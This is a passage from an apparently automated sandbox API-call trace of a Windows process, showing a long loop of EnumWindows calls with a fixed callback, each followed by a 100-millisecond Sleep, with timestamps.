EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.392] Sleep (dwMilliseconds=0x64) [0227.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.404] Sleep (dwMilliseconds=0x64) [0227.477] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.477] Sleep (dwMilliseconds=0x64) [0227.540] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.554] Sleep (dwMilliseconds=0x64) [0227.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.608] Sleep (dwMilliseconds=0x64) [0227.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.653] Sleep (dwMilliseconds=0x64) [0227.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.730] Sleep (dwMilliseconds=0x64) [0227.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.826] Sleep (dwMilliseconds=0x64) [0227.871] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.871] Sleep (dwMilliseconds=0x64) [0227.921] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.921] Sleep (dwMilliseconds=0x64) [0227.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.936] Sleep (dwMilliseconds=0x64) [0227.984] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.985] Sleep (dwMilliseconds=0x64) [0228.055] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.056] Sleep (dwMilliseconds=0x64) [0228.082] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.082] Sleep (dwMilliseconds=0x64) [0228.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.121] Sleep (dwMilliseconds=0x64) [0228.175] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.176] Sleep (dwMilliseconds=0x64) [0228.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.246] Sleep (dwMilliseconds=0x64) [0228.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.311] Sleep (dwMilliseconds=0x64) [0228.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.356] Sleep (dwMilliseconds=0x64) [0228.426] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.427] Sleep (dwMilliseconds=0x64) [0228.469] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.469] Sleep (dwMilliseconds=0x64) [0228.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.513] Sleep (dwMilliseconds=0x64) [0228.584] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.585] Sleep (dwMilliseconds=0x64) [0228.669] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.669] Sleep (dwMilliseconds=0x64) [0228.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.733] Sleep (dwMilliseconds=0x64) [0228.778] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.779] Sleep (dwMilliseconds=0x64) [0228.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.843] Sleep (dwMilliseconds=0x64) [0228.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.936] Sleep (dwMilliseconds=0x64) [0228.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0228.999] Sleep (dwMilliseconds=0x64) [0229.055] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.059] Sleep (dwMilliseconds=0x64) [0229.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.104] Sleep (dwMilliseconds=0x64) [0229.196] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.197] Sleep (dwMilliseconds=0x64) [0229.244] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.245] Sleep (dwMilliseconds=0x64) [0229.337] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.337] Sleep (dwMilliseconds=0x64) [0229.383] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.383] Sleep (dwMilliseconds=0x64) [0229.503] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.503] Sleep (dwMilliseconds=0x64) [0229.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.557] Sleep (dwMilliseconds=0x64) [0229.602] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.603] Sleep (dwMilliseconds=0x64) [0229.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.654] Sleep (dwMilliseconds=0x64) [0229.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.697] Sleep (dwMilliseconds=0x64) [0229.754] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.755] Sleep (dwMilliseconds=0x64) [0229.761] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.761] Sleep (dwMilliseconds=0x64) [0229.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.781] Sleep (dwMilliseconds=0x64) [0229.868] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.869] Sleep (dwMilliseconds=0x64) [0229.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0229.968] Sleep (dwMilliseconds=0x64) [0230.056] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.057] Sleep (dwMilliseconds=0x64) [0230.106] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.107] Sleep (dwMilliseconds=0x64) [0230.188] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.189] Sleep (dwMilliseconds=0x64) [0230.231] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.232] Sleep (dwMilliseconds=0x64) [0230.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.323] Sleep (dwMilliseconds=0x64) [0230.390] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.390] Sleep (dwMilliseconds=0x64) [0230.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.402] Sleep (dwMilliseconds=0x64) [0230.421] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.421] Sleep (dwMilliseconds=0x64) [0230.467] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.468] Sleep (dwMilliseconds=0x64) [0230.539] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.539] Sleep (dwMilliseconds=0x64) [0230.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.593] Sleep (dwMilliseconds=0x64) [0230.671] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.671] Sleep (dwMilliseconds=0x64) [0230.760] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.761] Sleep (dwMilliseconds=0x64) [0230.890] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0230.890] Sleep (dwMilliseconds=0x64) [0231.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.045] Sleep (dwMilliseconds=0x64) [0231.090] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.090] Sleep (dwMilliseconds=0x64) [0231.109] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.109] Sleep (dwMilliseconds=0x64) [0231.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.154] Sleep (dwMilliseconds=0x64) [0231.175] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.175] Sleep (dwMilliseconds=0x64) [0231.218] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.218] Sleep (dwMilliseconds=0x64) [0231.310] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.311] Sleep (dwMilliseconds=0x64) [0231.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.388] Sleep (dwMilliseconds=0x64) [0231.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.451] Sleep (dwMilliseconds=0x64) [0231.537] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.541] Sleep (dwMilliseconds=0x64) [0231.581] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.582] Sleep (dwMilliseconds=0x64) [0231.647] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.648] Sleep (dwMilliseconds=0x64) [0231.672] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.673] Sleep (dwMilliseconds=0x64) [0231.803] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.803] Sleep (dwMilliseconds=0x64) [0231.911] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.912] Sleep (dwMilliseconds=0x64) [0231.986] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0231.986] Sleep (dwMilliseconds=0x64) [0232.075] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0232.076] Sleep (dwMilliseconds=0x64) [0232.328] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0232.329] Sleep (dwMilliseconds=0x64) [0232.673] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0232.674] Sleep (dwMilliseconds=0x64) [0232.808] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0232.808] Sleep (dwMilliseconds=0x64) [0232.949] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0232.950] Sleep (dwMilliseconds=0x64) [0233.091] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.091] Sleep (dwMilliseconds=0x64) [0233.204] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.204] Sleep (dwMilliseconds=0x64) [0233.226] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.226] Sleep (dwMilliseconds=0x64) [0233.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.261] Sleep (dwMilliseconds=0x64) [0233.300] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.300] Sleep (dwMilliseconds=0x64) [0233.317] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.317] Sleep (dwMilliseconds=0x64) [0233.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.357] Sleep (dwMilliseconds=0x64) [0233.500] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.501] Sleep (dwMilliseconds=0x64) [0233.543] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.543] Sleep (dwMilliseconds=0x64) [0233.636] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.636] Sleep (dwMilliseconds=0x64) [0233.715] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.720] Sleep (dwMilliseconds=0x64) [0233.755] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.756] Sleep (dwMilliseconds=0x64) [0233.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.811] Sleep (dwMilliseconds=0x64) [0233.832] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.832] Sleep (dwMilliseconds=0x64) [0233.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.839] Sleep (dwMilliseconds=0x64) [0233.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.874] Sleep (dwMilliseconds=0x64) [0233.968] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0233.968] Sleep (dwMilliseconds=0x64) [0234.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.031] Sleep (dwMilliseconds=0x64) [0234.077] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.077] Sleep (dwMilliseconds=0x64) [0234.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.154] Sleep (dwMilliseconds=0x64) [0234.247] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.247] Sleep (dwMilliseconds=0x64) [0234.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.308] Sleep (dwMilliseconds=0x64) [0234.334] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.334] Sleep (dwMilliseconds=0x64) [0234.338] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.339] Sleep (dwMilliseconds=0x64) [0234.402] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.402] Sleep (dwMilliseconds=0x64) [0234.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.496] Sleep (dwMilliseconds=0x64) [0234.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.606] Sleep (dwMilliseconds=0x64) [0234.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.697] Sleep (dwMilliseconds=0x64) [0234.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.732] Sleep (dwMilliseconds=0x64) [0234.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.748] Sleep (dwMilliseconds=0x64) [0234.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.796] Sleep (dwMilliseconds=0x64) [0234.815] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.816] Sleep (dwMilliseconds=0x64) [0234.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.857] Sleep (dwMilliseconds=0x64) [0234.935] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0234.936] Sleep (dwMilliseconds=0x64) [0235.027] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.031] Sleep (dwMilliseconds=0x64) [0235.091] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.091] Sleep (dwMilliseconds=0x64) [0235.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.186] Sleep (dwMilliseconds=0x64) [0235.221] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.221] Sleep (dwMilliseconds=0x64) [0235.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.248] Sleep (dwMilliseconds=0x64) [0235.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.448] Sleep (dwMilliseconds=0x64) [0235.503] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.503] Sleep (dwMilliseconds=0x64) [0235.542] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.545] Sleep (dwMilliseconds=0x64) [0235.639] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.639] Sleep (dwMilliseconds=0x64) [0235.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.714] Sleep (dwMilliseconds=0x64) [0235.744] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.744] Sleep (dwMilliseconds=0x64) [0235.808] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.808] Sleep (dwMilliseconds=0x64) [0235.873] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.873] Sleep (dwMilliseconds=0x64) [0235.952] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.952] Sleep (dwMilliseconds=0x64) [0235.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0235.999] Sleep (dwMilliseconds=0x64) [0236.089] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.089] Sleep (dwMilliseconds=0x64) [0236.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.171] Sleep (dwMilliseconds=0x64) [0236.226] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.227] Sleep (dwMilliseconds=0x64) [0236.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.262] Sleep (dwMilliseconds=0x64) [0236.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.292] Sleep (dwMilliseconds=0x64) [0236.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.309] Sleep (dwMilliseconds=0x64) [0236.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.355] Sleep (dwMilliseconds=0x64) [0236.422] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.422] Sleep (dwMilliseconds=0x64) [0236.467] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.468] Sleep (dwMilliseconds=0x64) [0236.544] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.544] Sleep (dwMilliseconds=0x64) [0236.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.620] Sleep (dwMilliseconds=0x64) [0236.679] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.680] Sleep (dwMilliseconds=0x64) [0236.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.696] Sleep (dwMilliseconds=0x64) [0236.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.698] Sleep (dwMilliseconds=0x64) [0236.715] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.716] Sleep (dwMilliseconds=0x64) [0236.762] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.762] Sleep (dwMilliseconds=0x64) [0236.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.824] Sleep (dwMilliseconds=0x64) [0236.915] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0236.936] Sleep (dwMilliseconds=0x64) [0237.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.030] Sleep (dwMilliseconds=0x64) [0237.106] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.106] Sleep (dwMilliseconds=0x64) [0237.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.186] Sleep (dwMilliseconds=0x64) [0237.232] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.232] Sleep (dwMilliseconds=0x64) [0237.260] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.260] Sleep (dwMilliseconds=0x64) [0237.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.280] Sleep (dwMilliseconds=0x64) [0237.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.373] Sleep (dwMilliseconds=0x64) [0237.449] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.450] Sleep (dwMilliseconds=0x64) [0237.539] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.539] Sleep (dwMilliseconds=0x64) [0237.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.592] Sleep (dwMilliseconds=0x64) [0237.707] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.708] Sleep (dwMilliseconds=0x64) [0237.771] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.772] Sleep (dwMilliseconds=0x64) [0237.853] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.853] Sleep (dwMilliseconds=0x64) [0237.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0237.952] Sleep (dwMilliseconds=0x64) [0238.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.013] Sleep (dwMilliseconds=0x64) [0238.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.280] Sleep (dwMilliseconds=0x64) [0238.315] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.316] Sleep (dwMilliseconds=0x64) [0238.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.324] Sleep (dwMilliseconds=0x64) [0238.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.824] Sleep (dwMilliseconds=0x64) [0238.908] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0238.908] Sleep (dwMilliseconds=0x64) [0239.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.014] Sleep (dwMilliseconds=0x64) [0239.109] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.109] Sleep (dwMilliseconds=0x64) [0239.199] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.203] Sleep (dwMilliseconds=0x64) [0239.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.296] Sleep (dwMilliseconds=0x64) [0239.499] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.500] Sleep (dwMilliseconds=0x64) [0239.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.546] Sleep (dwMilliseconds=0x64) [0239.564] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.564] Sleep (dwMilliseconds=0x64) [0239.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.576] Sleep (dwMilliseconds=0x64) [0239.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.654] Sleep (dwMilliseconds=0x64) [0239.824] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.824] Sleep (dwMilliseconds=0x64) [0239.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0239.920] Sleep (dwMilliseconds=0x64) [0240.015] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.015] Sleep (dwMilliseconds=0x64) [0240.039] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.039] Sleep (dwMilliseconds=0x64) [0240.064] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.064] Sleep (dwMilliseconds=0x64) [0240.108] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.108] Sleep (dwMilliseconds=0x64) [0240.142] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.142] Sleep (dwMilliseconds=0x64) [0240.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.185] Sleep (dwMilliseconds=0x64) [0240.249] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.249] Sleep (dwMilliseconds=0x64) [0240.342] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.342] Sleep (dwMilliseconds=0x64) [0240.421] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.421] Sleep (dwMilliseconds=0x64) [0240.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.484] Sleep (dwMilliseconds=0x64) [0240.562] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.562] Sleep (dwMilliseconds=0x64) [0240.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.593] Sleep (dwMilliseconds=0x64) [0240.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.608] Sleep (dwMilliseconds=0x64) [0240.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.621] Sleep (dwMilliseconds=0x64) [0240.672] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.673] Sleep (dwMilliseconds=0x64) [0240.734] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.735] Sleep (dwMilliseconds=0x64) [0240.778] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.778] Sleep (dwMilliseconds=0x64) [0240.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.887] Sleep (dwMilliseconds=0x64) [0240.985] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0240.986] Sleep (dwMilliseconds=0x64) [0241.072] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.073] Sleep (dwMilliseconds=0x64) [0241.114] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.114] Sleep (dwMilliseconds=0x64) [0241.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.120] Sleep (dwMilliseconds=0x64) [0241.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.139] Sleep (dwMilliseconds=0x64) [0241.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.186] Sleep (dwMilliseconds=0x64) [0241.255] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.258] Sleep (dwMilliseconds=0x64) [0241.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.404] Sleep (dwMilliseconds=0x64) [0241.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.530] Sleep (dwMilliseconds=0x64) [0241.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.668] Sleep (dwMilliseconds=0x64) [0241.762] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.762] Sleep (dwMilliseconds=0x64) [0241.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0241.887] Sleep (dwMilliseconds=0x64) [0242.043] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.044] Sleep (dwMilliseconds=0x64) [0242.215] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.215] Sleep (dwMilliseconds=0x64) [0242.325] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.326] Sleep (dwMilliseconds=0x64) [0242.469] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.470] Sleep (dwMilliseconds=0x64) [0242.504] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.504] Sleep (dwMilliseconds=0x64) [0242.510] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.511] Sleep (dwMilliseconds=0x64) [0242.530] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.531] Sleep (dwMilliseconds=0x64) [0242.576] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.577] Sleep (dwMilliseconds=0x64) [0242.672] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.672] Sleep (dwMilliseconds=0x64) [0242.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.717] Sleep (dwMilliseconds=0x64) [0242.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.766] Sleep (dwMilliseconds=0x64) [0242.858] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.859] Sleep (dwMilliseconds=0x64) [0242.954] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.954] Sleep (dwMilliseconds=0x64) [0242.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0242.999] Sleep (dwMilliseconds=0x64) [0243.045] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.045] Sleep (dwMilliseconds=0x64) [0243.081] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.081] Sleep (dwMilliseconds=0x64) [0243.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.092] Sleep (dwMilliseconds=0x64) [0243.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.154] Sleep (dwMilliseconds=0x64) [0243.281] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.281] Sleep (dwMilliseconds=0x64) [0243.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.359] Sleep (dwMilliseconds=0x64) [0243.436] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.436] Sleep (dwMilliseconds=0x64) [0243.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.529] Sleep (dwMilliseconds=0x64) [0243.553] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.553] Sleep (dwMilliseconds=0x64) [0243.559] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.560] Sleep (dwMilliseconds=0x64) [0243.633] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.636] Sleep (dwMilliseconds=0x64) [0243.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0243.843] Sleep (dwMilliseconds=0x64) [0243.915] EnumWindows 